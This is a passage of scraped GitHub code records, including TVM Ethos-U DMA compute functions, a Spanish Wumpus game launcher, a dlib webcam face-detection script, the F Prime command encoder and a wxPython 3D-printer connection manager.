shape[2] + pad_left + pad_right, shape[3]),\n lambda nn, hh, ww, cc: _pad_tensor(tensor, pad_before, pad_after)(nn, hh, ww, cc),\n name=\"ethosu_pad\",\n attrs=pad_attrs,\n )\n\n\ndef upscale_compute(tensor: te.Tensor, upscale_factor: int) -> te.Tensor:\n \"\"\"Apply upscaling to an NHWC tensor.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n upscale_factor : int\n The factor by which to apply upscaling.\n\n 
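Raises\n    ------\n    AssertionError\n        If the upscale factor is not 1 or 2 (only 2x upscaling is supported).\n\n    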
Returns\n -------\n te.Tensor\n The upscaled tensor.\n\n \"\"\"\n shape = tensor.shape\n\n reason = f\"The compiler only supports 2x2 upscaling, but factor was {upscale_factor}.\"\n assert upscale_factor in (1, 2), reason\n new_shape = (shape[0], shape[1] * upscale_factor, shape[2] * upscale_factor, shape[3])\n\n upscale_attrs = {\"op\": \"ethosu_upscale\"}\n\n return te.compute(\n new_shape,\n lambda nn, hh, ww, cc: tensor(nn, hh // upscale_factor, ww // upscale_factor, cc),\n name=\"ethosu_upscale\",\n attrs=upscale_attrs,\n )\n\n\ndef dma_ifm_compute(\n ifm: te.Tensor,\n layout: str,\n zero_point: int,\n scale: float,\n channels: int,\n padding: Tuple[int, int, int, int],\n upscale_factor: Optional[int] = 1,\n) -> te.Tensor:\n \"\"\"A sequence of compute operators representing the DMA capabilities for an IFM.\n\n Parameters\n ----------\n ifm : te.Tensor\n The Input Feature Map (IFM) tensor.\n layout : str\n The layout of the data, either NHWC or NHCWB16.\n zero_point : int\n The zero point of the data.\n scale : float\n The scale of the data.\n channels : int\n The number of valid channels for the data.\n padding : tuple\n The 4 dimensional padding as (pad_top, pad_left, pad_bottom, pad_right).\n upscale_factor : Optional[int]\n The factor by which to apply upscaling. By default there will be no upscaling.\n\n Returns\n -------\n te.Tensor\n The dma-ed IFM tensor.\n\n \"\"\"\n read_ifm = read_compute(ifm, zero_point, scale, layout=layout)\n convert_to_nhwc_ifm = convert_to_nhwc_compute(read_ifm, layout, channels)\n upscale_ifm = upscale_compute(convert_to_nhwc_ifm, upscale_factor)\n return pad_compute(upscale_ifm, padding)\n\n\ndef dma_ofm_compute(\n ofm: te.Tensor, layout: str, zero_point: int, scale: float, channels: int, attrs: dict = None\n) -> te.Tensor:\n \"\"\"A sequence of compute operators representing the DMA capabilities for an OFM.\n\n Parameters\n ----------\n ofm : te.Tensor\n The Output Feature Map (OFM) tensor.\n layout : str\n The layout of the data, either NHWC or NHCWB16.\n zero_point : int\n The zero point of the data.\n scale : float\n The scale of the data.\n channels : int\n The number of valid channels for the data.\n attrs : dict, optional\n Additional attributes to add to the write compute op.\n\n\n Returns\n -------\n te.Tensor\n The dma-ed OFM tensor.\n\n \"\"\"\n if not attrs:\n attrs = {}\n convert_to_nhcwb16_ofm = convert_to_nhcwb16_compute(ofm, layout, channels)\n return write_compute(convert_to_nhcwb16_ofm, zero_point, scale, layout=layout, attrs=attrs)\n","repo_name":"apache/tvm","sub_path":"python/tvm/relay/backend/contrib/ethosu/te/dma.py","file_name":"dma.py","file_ext":"py","file_size_in_byte":10267,"program_lang":"python","lang":"en","doc_type":"code","stars":10533,"dataset":"github-code","pt":"95"} +{"seq_id":"18611012416","text":"# coding: utf-8\n# author: David Labu\n\nimport wumpus_v2\nimport argparse\nimport time\nimport sys\n\n\ndef launch(n, h, a, c):\n '''\n :param n: casillas alto / ancho tablero [n = number]\n :param h: número de hoyos (recomendado n - 2) [h = holes]\n :param a: número de flechas disponible [a = arrow]\n :param c: trucos activados. 
permite visualziar el mapa\n '''\n try:\n # preparar partida\n print('¡Bienvenido a Hunt The Wumpus!\\n')\n if not n:\n print('Introduce el tamaño del tablero.')\n n = wumpus_v2.get_input_number()\n if not h:\n print('Introduce el número de pozos')\n h = wumpus_v2.get_input_number()\n if not a:\n print('Introduce el número de flechas')\n a = wumpus_v2.get_input_number()\n print('Creando Tablero...')\n partida = wumpus_v2.HuntTheWumpus(n, h, a)\n # empezar turnos\n print_delay('''\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\n * __ __ *\n * \\ \\ / / *\n * \\ \\ /\\ / / _ _ __ ___ _ __ _ _ ___ *\n * \\ \\/ \\/ / | | | '_ ` _ \\| '_ \\| | | / __| *\n * \\ /\\ /| |_| | | | | | | |_) | |_| \\__ \\ *\n * \\/ \\/ \\__,_|_| |_| |_| .__/ \\__,_|___/ *\n * | | *\n * |_| *\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* \n ''')\n print('\\nEntras en la caverna del Wumpus y lo primero que ves es...')\n if c:\n partida.board.print_board()\n while not partida.config.endgame:\n partida.print_perception()\n print('¿qué decides?:\\n\\t1- Avanzar\\n\\t2- Girar\\n\\t3- Atacar\\n\\t4- Escapar')\n partida.action = wumpus_v2.get_input_number()\n while not 1 <= partida.action <= 4:\n print('¡No puedo hacer nada con eso!')\n print('Estas son tus opciones:\\n\\t1- Avanzar\\n\\t2- Girar\\n\\t3- Atacar\\n\\t4- Escapar')\n partida.action = wumpus_v2.get_input_number()\n partida.do_action()\n\n except Exception as e:\n print('[ERROR] Fin de partida! Con su fuerza de voluntad, Wumpus '\n 'ha usado el hechizo incontrarestable ' + str(e))\n raise e\n\n\ndef print_delay(cool_string):\n for char in cool_string:\n time.sleep(0.02)\n print_by_sys(char)\n\n\ndef print_by_sys(string):\n sys.stdout.write(string)\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-n', '--number', help='casillas alto / ancho tablero', type=int, default=None)\n ap.add_argument('-w', '--well', help='número de hoyos', type=int, default=None)\n ap.add_argument('-a', '--arrow', help='número de flechas disponible', type=int, default=None)\n ap.add_argument('-c', '--cheats', help='black sheep wall muestra el mapa', type=int, default=None)\n args = vars(ap.parse_args())\n launch(args['number'], args['well'], args['arrow'], args['cheats'])\n # launch(None, None, None)\n","repo_name":"Labuiga/wumpy","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36228989741","text":"import cv2\nimport urllib \nimport sys\nimport numpy as np\nimport dlib\nfrom skimage import io\n\n\nstream=urllib.urlopen('http://oviso.axiscam.net/axis-cgi/mjpg/video.cgi')\n#cascPath = sys.argv[1]\n#faceCascade = cv2.CascadeClassifier(cascPath)\n\ndetector = dlib.get_frontal_face_detector()\nwin = dlib.image_window()\n\nbytes=''\nwhile True:\n bytes+=stream.read(1024)\n a = bytes.find('\\xff\\xd8')\n b = bytes.find('\\xff\\xd9')\n if a!=-1 and b!=-1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),cv2.IMREAD_COLOR)\n gray = cv2.cvtColor(i, cv2.COLOR_BGR2RGB)\n \n dets = detector(i, 1)\n\n print(\"Number of faces detected: {}\".format(len(dets)))\n for i, d in enumerate(dets):\n print(\"Detection {}: Left: {} Top: {} Right: {} Bottom: {}\".format(\n i, d.left(), d.top(), d.right(), d.bottom()))\n\n win.clear_overlay()\n win.set_image(gray)\n 
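# overlay dlib's detection rectangles on the displayed frame\n        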
win.add_overlay(dets)\n","repo_name":"serman/watermachinecontrol","sub_path":"test_examples/dlib-mjpeg-example.py","file_name":"dlib-mjpeg-example.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"34076131632","text":"\"\"\"\n@brief Encoder for cmd data\n\nThis encoder takes in cmd_data objects, serializes them, and sends the results\nto all registered senders.\n\nSerialized command format:\n +--------------------------------+ -\n | Header = \"A5A5 \" | |\n | (5 byte string) | |\n +--------------------------------+ Added by\n | Destination = \"GUI \" or \"FSW \" | Sender\n | (4 byte string) | |\n +--------------------------------+ -\n | Command descriptor |\n | (0x5A5A5A5A) |\n | (4 byte number) |\n +--------------------------------+\n | Length of descriptor, opcode, |\n | and argument data |\n | (4 bytes) |\n +--------------------------------+\n | Descriptor type = 0 |\n | (4 bytes) |\n +--------------------------------+\n | Op code |\n | (4 bytes) |\n +--------------------------------+\n | Argument 1 value |\n +--------------------------------+\n | Argument 2 value |\n +--------------------------------+\n | ... |\n +--------------------------------+\n | Argument n value |\n +--------------------------------+\n\n@date Created July 9, 2018\n@author R. Joseph Paetz\n\n@bug No known bugs\n\"\"\"\n\n\nfrom fprime.common.models.serialize.numerical_types import U32Type\n\nfrom fprime_gds.common.data_types.cmd_data import CmdData\nfrom fprime_gds.common.utils import config_manager\nfrom fprime_gds.common.utils.data_desc_type import DataDescType\n\nfrom . import encoder\n\n\nclass CmdEncoder(encoder.Encoder):\n \"\"\"Encoder class for command data\"\"\"\n\n def __init__(self, config=None):\n \"\"\"\n CmdEncoder class constructor\n\n Args:\n config (ConfigManager, default=None): Object with configuration data\n for the sizes of fields in the binary data. 
If None passed,\n defaults are used.\n\n Returns:\n An initialized CmdEncoder object\n \"\"\"\n\n if config is None:\n config = config_manager.ConfigManager().get_instance()\n super().__init__(config)\n\n self.len_obj = self.config.get_type(\"msg_len\")\n self.desc_obj = self.config.get_type(\"msg_desc\")\n self.opcode_obj = self.config.get_type(\"op_code\")\n\n def encode_api(self, data):\n \"\"\"\n Encodes the given CmdData object as binary data and returns the result.\n\n Args:\n data: CmdData object to encode\n\n Returns:\n Encoded version of the data argument as binary data\n \"\"\"\n assert isinstance(data, CmdData), \"Encoder handling incorrect type\"\n cmd_temp = data.get_template()\n\n desc = U32Type(0x5A5A5A5A).serialize()\n\n self.desc_obj.val = DataDescType[\"FW_PACKET_COMMAND\"].value\n descriptor = self.desc_obj.serialize()\n\n self.opcode_obj.val = cmd_temp.get_op_code()\n op_code = self.opcode_obj.serialize()\n\n arg_data = b\"\"\n for arg in data.get_args():\n arg_data += arg.serialize()\n\n length_val = len(descriptor) + len(op_code) + len(arg_data)\n self.len_obj.val = length_val\n length = self.len_obj.serialize()\n\n binary_data = desc + length + descriptor + op_code + arg_data\n\n return binary_data\n","repo_name":"fprime-community/fprime-gds","sub_path":"src/fprime_gds/common/encoders/cmd_encoder.py","file_name":"cmd_encoder.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"95"} +{"seq_id":"73151519993","text":"import os\nimport wx.lib.newevent\nimport glob\nimport time \nimport thread\nfrom sys import platform as _platform\nif _platform == \"linux\" or _platform == \"linux2\":\n\timport termios #@UnresolvedImport\n\nfrom settings import BUTTONDIM, BUTTONDIMLG, RECEIVED_MSG\nfrom pendant import Pendant\nfrom webcamclient import Webcam\nfrom XMLDoc import XMLDoc\n\nbaudChoices = [\"2400\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\", \"250000\"]\n\nfrom reprap import RepRap, RepRapParser\n\n(PendantEvent, EVT_PENDANT) = wx.lib.newevent.NewEvent()\nPENDANT_CONNECT = 0\nPENDANT_DISCONNECT = 1\nPENDANT_COMMAND = 3\n\nTRACE = False\n\nVISIBLELISTSIZE = 5\n\nTLTICKRATE = 10\nMAXDIRCHARS = 50\nMAXSTATCHARS = 50\n\n\nclass Connection:\n\tdef __init__(self, app, printer, port, baud):\n\t\tself.app = app\n\t\tself.logger = self.app.logger\n\t\tself.printer = printer\n\t\tself.port = port\n\t\tself.parser = RepRapParser(self.app)\n\t\tself.reprap = RepRap(self.app, printer)\n\t\tself.connected = self.reprap.connect(port, baud)\n\t\tself.prtmon = None\n\t\tself.manctl = None\n\t\tself.pendantConnected = False\n\t\t\n\tdef getPrinter(self):\n\t\treturn self.printer\n\n\tdef isConnected(self):\n\t\treturn self.connected\n\n\tdef hasPendant(self):\n\t\treturn self.pendantConnected\n\n\tdef setPendant(self, flag=True):\n\t\tself.pendantConnected = flag\n\n\tdef tick(self):\n\t\tif self.prtmon is not None:\n\t\t\tself.prtmon.tick()\n\t\t\n\tdef assertAllowPulls(self, flag):\n\t\tif self.prtmon is not None:\n\t\t\tself.prtmon.assertAllowPulls(flag)\n\t\t\t\n\tdef isPrinting(self):\n\t\tif self.prtmon is not None:\n\t\t\treturn self.prtmon.isPrinting()\n\t\treturn False\n\t\t\n\tdef close(self):\n\t\tself.reprap.disconnect()\n\t\twhile not self.reprap.checkDisconnection():\n\t\t\ttime.sleep(0.1)\n\t\tself.reprap = None\n\t\t\n\t\tself.parser = None\n\t\t\n\t\tif self.prtmon:\n\t\t\tself.prtmon.onClose(None)\n\t\t\tself.prtmon = None\n\t\t\t\n\t\tif self.manctl:\n\t\t\tself.manctl = 
None\n\n\tdef setNBPages(self, pm, mc):\n\t\tself.prtmon = pm\n\t\tself.manctl = mc\n\t\tself.parser.config(pm, mc)\n\t\tself.reprap.bind(pm, self.evtRepRap)\n\t\t\n\tdef evtRepRap(self, evt):\n\t\tif evt.event == RECEIVED_MSG:\n\t\t\tif self.parser is not None:\n\t\t\t\tif not self.parser.parseMsg(evt.msg):\n\t\t\t\t\tself.logger.LogMessage(\"(r) - \" + evt.msg)\n\t\telif self.prtmon is not None:\n\t\t\tself.prtmon.reprapEvent(evt)\n\nclass ConnectionManager:\n\tdef __init__(self, app):\n\t\tself.app = app\n\t\tself.settings = self.app.settings\n\t\tself.logger = self.app.logger\n\t\tself.connections = []\n\t\n\t\tself.portList = self.getPortList()\t\n\t\t\t\t\t\n\t\tself.printerList = self.settings.printers[:]\n\t\tself.activePorts = []\n\t\tself.activePrinters = []\n\t\tself.pendantConnection = None\n\t\tself.pendantIndex = None\n\t\tself.manageDlg = None\n\t\t\n\tdef manageDlgClose(self):\n\t\tself.manageDlg = None\n\t\t\n\tdef getPortList(self):\n\t\t\"\"\"scan for available ports. return a list of device names.\"\"\"\n\t\tpl = []\n\t\tfor pt in self.settings.portprefixes:\n\t\t\tpl += glob.glob(pt)\n\t\t\t\n\t\treturn sorted(pl)\n\n\tdef connectionCount(self):\n\t\treturn len(self.connections)\n\t\t\t\t\t\n\tdef getLists(self, refreshPorts=False):\n\t\tif refreshPorts:\n\t\t\tpl = self.getPortList()\n\t\t\tself.portList = []\n\t\t\tfor p in pl:\n\t\t\t\tif p not in self.activePorts:\n\t\t\t\t\tself.portList.append(p)\n\n\t\treturn (self.printerList, self.portList, self.connections)\n\t\t\n\tdef getStatus(self):\n\t\tstat = {}\n\t\tstat['nconnections'] = len(self.connections)\n\n\t\tcx = 1\t\t\t\n\t\tfor p in self.connections:\n\t\t\tpst = {}\n\t\t\tpst['printer'] = p.printer\n\t\t\tpst['port'] = p.port\n\t\t\tif p.isPrinting():\n\t\t\t\tpst['status'] = \"printing\"\n\t\t\t\tpst['printstat'] = p.prtmon.getStatus()\n\t\t\telse:\n\t\t\t\tpst['status'] = \"idle\"\n\n\t\t\tcid = \"connection.%d\" % cx\t\t\t\t\n\t\t\tstat[cid] = pst\n\t\t\tcx += 1\n\t\t\t\t\n\t\treturn stat\n\t\n\tdef getTemps(self):\n\t\tresult = {}\n\t\tresult['nconnections'] = len(self.connections)\n\n\t\tcx = 1\t\t\t\n\t\tfor p in self.connections:\n\t\t\tpt = {}\n\t\t\tpt['printer'] = p.printer\n\t\t\tpt['temps'] = p.prtmon.getTemps()\n\n\t\t\tcid = \"connection.%d\" % cx\t\t\t\t\n\t\t\tresult[cid] = pt\n\t\t\tcx += 1\n\t\t\t\n\t\treturn result\n\t\n\tdef pendantCommand(self, cmd):\n\t\tif self.pendantConnection:\n\t\t\tif not self.pendantConnection.manctl.pendantCommand(cmd):\n\t\t\t\tif not self.pendantConnection.prtmon.pendantCommand(cmd):\n\t\t\t\t\tself.logger.LogMessage(\"Unknown pendant command: %s\" % cmd)\n\n\t\telse:\n\t\t\tself.logger.LogMessage(\"Pendant command ignored - no printer connected\")\n\n\tdef activatePendant(self, flag):\n\t\tself.pendantConnection = None\n\t\tself.pendantIndex = None\n\t\tfor cx in self.connections:\n\t\t\tcx.setPendant(False)\n\n\t\tif flag:\n\t\t\tif len(self.connections) > 0:\n\t\t\t\tself.pendantConnection = self.connections[0]\n\t\t\t\tself.pendantConnection.setPendant(True)\n\t\t\t\tself.pendantIndex = 0\n\n\tdef connectPendant(self, cx):\n\t\tif cx == self.pendantIndex:\n\t\t\treturn\n\n\t\tif cx < 0 or cx >= len(self.connections):\n\t\t\tself.pendantIndex = None\n\t\t\tself.pendantConnection = None\n\t\t\tfor c in self.connections:\n\t\t\t\tc.setPendant(False)\n\t\t\tself.app.setPendantConnection(None)\n\t\telse:\n\t\t\tself.pendantIndex = cx\n\t\t\tif not self.pendantConnection is None:\n\t\t\t\tself.pendantConnection.setPendant(False)\n\t\t\tself.pendantConnection = 
self.connections[cx]\n\t\t\tself.pendantConnection.setPendant(True)\n\t\t\tself.app.setPendantConnection(self.connections[cx].printer)\n\t\n\tdef connect(self, printer, port, baud):\n\t\tcx = Connection(self.app, printer, port, baud)\n\t\tif not cx.isConnected():\n\t\t\tself.logger.LogMessage(\"Unable to connect to port %s\" % port)\n\t\t\treturn False\n\n\t\tself.connections.append(cx)\n\t\tif len(self.connections) == 1:\n\t\t\tself.pendantConnection = cx\n\t\t\tself.pendantIndex = 0\n\t\t\tcx.setPendant(True)\n\t\telse:\n\t\t\tcx.setPendant(False)\n\t\t\t\n\t\tself.activePorts.append(port)\n\t\tself.activePrinters.append(printer)\n\t\tself.portList.remove(port)\n\t\tself.printerList.remove(printer)\n\t\t(pm, mc) = self.app.addPages(printer, cx.reprap)\n\t\tcx.setNBPages(pm, mc)\n\t\treturn True\n\t\t\n\tdef connectionByPrinter(self, printer):\n\t\ttry:\n\t\t\tidx = self.activePrinters.index(printer)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with printer %s\" % printer)\n\t\t\treturn None\n\t\t\n\t\treturn self.connections[idx]\n\t\n\tdef getConnection(self, cx):\n\t\tif cx < 0 or cx >= len(self.connections):\n\t\t\treturn None\n\t\telse:\n\t\t\treturn self.connections[cx]\n\t\t\n\tdef disconnectByPrinter(self, printer):\n\t\ttry:\n\t\t\tidx = self.activePrinters.index(printer)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with printer %s\" % printer)\n\t\t\treturn False\n\t\t\n\t\tdel self.activePrinters[idx]\n\t\tport = self.activePorts[idx]\n\t\tdel self.activePorts[idx]\n\t\tcon = self.connections[idx]\n\t\tdel self.connections[idx]\n\t\t\n\t\tself.fixPendantLinkage(self.pendantIndex == idx)\n\t\t\n\t\tself.printerList.append(printer)\n\t\tself.printerList.sort()\n\t\tself.portList.append(port)\n\t\tself.portList.sort()\n\t\tself.app.delPages(printer)\n\n\t\tcon.close()\n\t\treturn True\n\t\t\n\tdef disconnectByPort(self, port):\n\t\ttry:\n\t\t\tidx = self.activePorts.index(port)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with port %s\" % port)\n\t\t\treturn False\n\t\t\n\t\tdel self.activePorts[idx]\n\t\tprinter = self.activePrinters[idx]\n\t\tdel self.activePrinters[idx]\n\t\tcon = self.connections[idx]\n\t\tdel self.connections[idx]\n\t\t\n\t\tself.fixPendantLinkage(self.pendantIndex == idx)\n\t\t\n\t\tself.printerList.append(printer)\n\t\tself.printerList.sort()\n\t\tself.portList.append(port)\n\t\tself.portList.sort()\n\t\tself.app.delPages(printer)\n\n\t\tcon.close()\n\t\treturn True\n\n\n\tdef fixPendantLinkage(self, delPendant):\n\t\tif delPendant:\n\t\t\tif len(self.connections) == 0:\n\t\t\t\tself.pendantIndex = None\n\t\t\t\tself.pendantConnection = None\n\t\t\telse:\n\t\t\t\tself.pendantIndex = 0\n\t\t\t\tself.pendantConnection = self.connections[0]\n\t\t\t\tself.pendantConnection.setPendant(True)\n\t\telse:\n\t\t\tself.pendantIndex = None\n\t\t\tfor ix in range(len(self.connections)):\n\t\t\t\tif self.connections[ix].hasPendant():\n\t\t\t\t\tself.pendantIndex = ix\n\t\t\t\t\tbreak\n\t\t\tif self.pendantIndex is None:\n\t\t\t\tself.pendantConnection = None\n\t\n\tdef disconnectAll(self):\n\t\tfor p in self.activePrinters:\n\t\t\tself.app.delPages(p)\n\t\tself.printerList.extend(self.activePrinters)\n\t\tself.activePrinters = []\n\t\tself.portList.extend(self.activePorts)\n\t\tself.activePorts = []\n\t\tfor c in self.connections:\n\t\t\tc.close()\n\t\tself.connections = []\n\t\tself.pendantIndex = None\n\t\tself.pendantConnection = None\n\t\n\tdef disconnectByRepRap(self, reprap):\n\t\tport = 
reprap.getPort()\n\t\treturn self.disconnectByPort(port)\n\t\nclass SnapFrame(wx.Frame):\n\tdef __init__(self, parent, picfn):\n\t\tself.fn = picfn\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, \"Snapshot\", (-1, -1), (-1, -1), wx.DEFAULT_FRAME_STYLE)\n\t\tself.Bind(wx.EVT_CLOSE, self.onClose)\n\t\t\n\t\tpng = wx.Image(picfn, wx.BITMAP_TYPE_PNG).ConvertToBitmap()\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\tsz.Add(wx.StaticBitmap(self, wx.ID_ANY, png, (-1, -1), (png.GetWidth(), png.GetHeight())))\n\t\tsz.AddSpacer((10,10))\n\t\t\n\t\tself.cbRetain = wx.CheckBox(self, wx.ID_ANY, \"Retain file %s\" % picfn)\n\t\tsz.Add(self.cbRetain, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)\n\t\tsz.AddSpacer((10,10))\n\t\t\n\t\tself.SetSizer(sz)\n\t\tself.Fit()\n\t\t\t\n\tdef onClose(self, evt):\n\t\tif not self.cbRetain.IsChecked():\n\t\t\ttry:\n\t\t\t\tos.unlink(self.fn)\n\t\t\texcept:\n\t\t\t\tpass\n\t\tself.Destroy()\n\nclass ConnectionManagerPanel(wx.Panel):\n\tdef __init__(self, parent, app):\n\t\tself.parent = parent\n\t\tself.app = app\n\t\tself.settings = self.app.settings\n\t\tself.logger = self.app.logger\n\t\tself.CameraPort = None\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = False\n\t\tself.tlTick = 0\n\t\t\n\t\tself.vSaturation = -1\n\t\tself.vContrast = -1\n\t\tself.vBrightness = -1\n\t\t\n\t\twx.Panel.__init__(self, parent, wx.ID_ANY, size=(400, 250))\n\t\t\n\t\tself.CamLock = thread.allocate_lock()\n\n\t\tself.cm = ConnectionManager(self.app)\n\t\tself.Bind(EVT_PENDANT, self.pendantCommand)\n\t\tself.pendant = Pendant(self.pendantEvent, self.settings.pendantPort, self.settings.pendantBaud)\n\t\tself.pendantActive = False\n\t\t\n\t\tself.webcam = Webcam(self.settings.cameraport, self.settings.cmdfolder)\n\t\t\n\t\tself.camActive = False\n\t\tself.resolution = self.settings.resolution #TODO: work this back in\n\t\t\n\t\tf = wx.Font(12, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.WindowDC(self)\n\t\tdc.SetFont(f)\n\n\t\tself.sizer = wx.BoxSizer(wx.VERTICAL)\n\n\t\tsboxConnect = wx.StaticBox(self, -1, \"Available ports/printers:\")\n\t\tszsbConnect = wx.StaticBoxSizer(sboxConnect, wx.VERTICAL)\n\t\t\n\t\tszConnect = wx.BoxSizer(wx.VERTICAL)\n\t\tszConnect.AddSpacer((20, 20))\n\t\t\n\t\tszRow = wx.BoxSizer(wx.HORIZONTAL)\n\t\tszRow.AddSpacer((20, 20))\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\ttext = \"Port:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\t\t\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\t(printers, ports, connections) = self.cm.getLists()\n\t\t\n\t\tself.lbPort = wx.ListBox(self, wx.ID_ANY, (-1, -1), (270, 120), ports, wx.LB_SINGLE)\n\t\tself.lbPort.SetFont(f)\n\t\tself.lbPort.SetToolTipString(\"Choose the port to which to connect\")\n\t\tif len(ports) == 0:\n\t\t\tself.lbPort.Disable()\n\t\telse:\n\t\t\tself.lbPort.Enable()\n\t\t\tself.lbPort.SetSelection(0)\n\t\tsz.Add(self.lbPort)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((10, 10))\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\ttext = \"Baud:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\t\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\tself.lbBaud = wx.ListBox(self, wx.ID_ANY, (-1, -1), (100, 150), baudChoices, wx.LB_SINGLE)\n\t\tself.lbBaud.SetFont(f)\n\t\tself.lbBaud.SetToolTipString(\"Choose the baud 
rate\")\n\t\tself.lbBaud.SetSelection(5)\n\t\tsz.Add(self.lbBaud)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((10, 10))\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\t\n\t\ttext = \"Printer:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\tself.lbPrinter = wx.ListBox(self, wx.ID_ANY, (-1, -1), (100, 120), printers, wx.LB_SINGLE)\n\t\tself.lbPrinter.SetFont(f)\n\t\tself.lbPrinter.SetToolTipString(\"Choose the printer\")\n\t\tself.lbPrinter.SetSelection(0)\n\t\tsz.Add(self.lbPrinter)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((20, 20))\n\t\tszConnect.Add(szRow)\n\t\tszConnect.AddSpacer((20, 20))\n\t\t\n\t\tsboxDisconnect = wx.StaticBox(self, -1, \"Active Connections:\")\n\t\tszsbDisconnect = wx.StaticBoxSizer(sboxDisconnect, wx.VERTICAL)\n\t\tszDisconnect = wx.BoxSizer(wx.HORIZONTAL)\n\t\tszDisconnect.AddSpacer((20, 20))\n\n\t\tself.lbConnections = ActiveConnectionCtrl(self, self.app.images)\n\t\tself.lbConnections.SetToolTipString(\"Choose the connection\")\n\t\tself.loadConnections(connections)\n\t\tszDisconnect.Add(self.lbConnections, flag=wx.ALL, border=10)\n\t\t\n\t\tszButtons = wx.BoxSizer(wx.VERTICAL)\n\t\t\t\n\t\tszButtons.AddSpacer((10, 10))\n\t\t\n\t\tself.bConnect = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngConnect, size=BUTTONDIMLG)\n\t\tself.bConnect.SetToolTipString(\"Connect to the printer\")\n\t\tself.Bind(wx.EVT_BUTTON, self.doConnect, self.bConnect)\n\t\tszButtons.Add(self.bConnect, flag=wx.ALL, border=10)\n\t\tself.bConnect.Enable(len(ports) >= 1)\n\t\tszButtons.AddSpacer((10, 10))\n\n\t\tself.bDisconnect = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngDisconnect, size=BUTTONDIMLG)\n\t\tself.bDisconnect.SetToolTipString(\"Disconnect the printer\")\n\t\tszButtons.Add(self.bDisconnect, flag=wx.ALL, border=10)\n\t\tself.bDisconnect.Enable(False)\n\t\tself.Bind(wx.EVT_BUTTON, self.doDisconnect, self.bDisconnect)\n\t\tszButtons.AddSpacer((20, 20))\n\n\t\tself.bReset = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngReset, size=BUTTONDIMLG)\n\t\tself.bReset.SetToolTipString(\"Reset the printer\")\n\t\tszButtons.Add(self.bReset, flag=wx.ALL, border=10)\n\t\tself.Bind(wx.EVT_BUTTON, self.doReset, self.bReset)\n\t\tself.bReset.Enable(False)\n\t\tszButtons.AddSpacer((20, 20))\n\t\t\n\t\tself.bPort = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngPorts, size=BUTTONDIMLG)\n\t\tself.bPort.SetToolTipString(\"Refresh list of available ports\")\n\t\tszButtons.Add(self.bPort, flag=wx.ALL, border=10)\n\t\tself.Bind(wx.EVT_BUTTON, self.doPort, self.bPort)\n\n\t\tszsbConnect.Add(szConnect)\n\t\tszsbDisconnect.Add(szDisconnect)\n\n\t\tsboxCamera = wx.StaticBox(self, -1, \"Camera\")\n\t\tszsbCamera = wx.StaticBoxSizer(sboxCamera, wx.VERTICAL)\n\t\tszCamera = wx.BoxSizer(wx.HORIZONTAL)\n\n\t\tsboxCamCtrl = wx.StaticBox(self, -1, \"Camera Control\")\n\t\thszCamCtrl = wx.StaticBoxSizer(sboxCamCtrl, wx.HORIZONTAL)\n\t\tszCamCtrl = wx.BoxSizer(wx.VERTICAL)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\n\t\tself.cbCamActive = wx.CheckBox(self, wx.ID_ANY, \"Activate Camera\")\n\t\tself.cbCamActive.SetToolTipString(\"Activate/Deactivate the camera\")\n\t\tself.Bind(wx.EVT_CHECKBOX, self.checkCamActive, self.cbCamActive)\n\t\tszCamCtrl.Add(self.cbCamActive)\n\t\tself.cbCamActive.SetValue(False)\n\t\tself.camActive = False\n\t\t\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\t\n\t\tports = self.getCamPorts()\n\t\tself.lbCamPort = wx.ListBox(self, wx.ID_ANY, (-1, -1), (270, 120), ports, 
